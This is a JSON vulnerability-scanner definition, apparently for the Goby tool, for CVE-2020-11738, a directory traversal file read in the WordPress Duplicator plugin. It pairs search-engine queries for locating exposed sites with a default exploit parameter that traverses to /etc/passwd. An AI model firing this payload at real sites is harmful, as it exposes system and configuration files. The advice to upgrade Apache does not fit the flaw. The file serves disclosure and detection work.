{ "Name": "Wordpress Duplicator 1.3.26 Arbitrary File Read (CVE-2020-11738)", "Description": "
Duplicator is a powerful migrator plugin for Wordpress.
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
", "Product": "Duplicator", "Homepage": "https://wordpress.org/plugins/duplicator/", "DisclosureDate": "2021-10-06", "Author": "1291904552@qq.com", "FofaQuery": "app=\"WordPress\" && body=\"Duplicator\"", "GobyQuery": "app=\"WordPress\" && body=\"Duplicator\"", "Level": "2", "Impact": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
", "Recommandation": "The vendor has released a bug fix, please pay attention to the update in time: https://wordpress.org/plugins/duplicator
1. Set access policies and whitelist access through security devices such as firewalls.
2. Upgrade the Apache system version.
", "Translation": { "CN": { "Name": "Wordpress 插件 Duplicator 任意文件读取漏洞(CVE-2020-11738)", "VulType": ["文件读取"], "Tags": ["文件读取"], "Description": "Duplicator是Wordpress的一个强大的迁移器插件。
WordPress 1.3.28 之前的 Snap Creek Duplicator 插件(以及 3.8.7.1 之前的 Duplicator Pro)允许通过文件参数中的 ../ 对 duplicator_download 或 duplicator_init 进行目录遍历,攻击者可获取配置等敏感信息。
", "Impact": "WordPress 1.3.28 之前的 Snap Creek Duplicator 插件(以及 3.8.7.1 之前的 Duplicator Pro)允许通过文件参数中的 ../ 对 duplicator_download 或 duplicator_init 进行目录遍历,攻击者可获取配置等敏感信息。
", "Product": "Duplicator", "Recommendation": "⼚商已发布了漏洞修复程序,请及时关注更新: https://wordpress.org/plugins/duplicator
1、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
2、升级Apache系统版本。
" }, "EN": { "Name": "Wordpress Duplicator 1.3.26 Arbitrary File Read(CVE-2020-11738)", "VulType": ["fileread"], "Tags": ["fileread"], "Description": "Duplicator is a powerful migrator plugin for Wordpress.
The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
", "Impact": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.
", "Product": "Duplicator", "Recommendation": "The vendor has released a bug fix, please pay attention to the update in time: https://wordpress.org/plugins/duplicator
1. Set access policies and whitelist access through security devices such as firewalls.
2.Upgrade the Apache system version.
" } }, "References": [ "https://nvd.nist.gov/vuln/detail/CVE-2020-11738" ], "HasExp": true, "ExpParams": [ { "name": "filepath", "type": "input", "value": "../../../../../../../../../etc/passwd" } ], "ExpTips": null, "ScanSteps": null, "ExploitSteps": null, "Tags": [ "fileread" ], "VulType": ["fileread"], "CVEIDs": ["CVE-2020-11738"], "CVSSScore": "7.5", "AttackSurfaces": { "Application": ["Duplicator"], "Support": null, "Service": null, "System": null, "Hardware": null } }